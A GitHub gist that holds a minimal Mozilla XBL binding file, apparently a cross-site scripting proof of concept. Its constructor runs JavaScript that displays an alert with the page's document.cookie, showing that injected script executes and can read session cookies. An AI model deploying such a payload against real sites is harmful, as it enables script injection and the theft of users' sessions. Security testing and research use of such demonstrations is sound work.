Skip to content

Instantly share code, notes, and snippets.

@dlh3
Last active October 12, 2018 22:24
Show Gist options
  • Select an option

  • Save dlh3/47559691cbd0c5c6d9ab57ca96214130 to your computer and use it in GitHub Desktop.

Select an option

Save dlh3/47559691cbd0c5c6d9ab57ca96214130 to your computer and use it in GitHub Desktop.
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="mycode">
<implementation>
<constructor>
alert("XBL script executed.\n" + document.cookie);
</constructor>
</implementation>
</binding>
</bindings>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment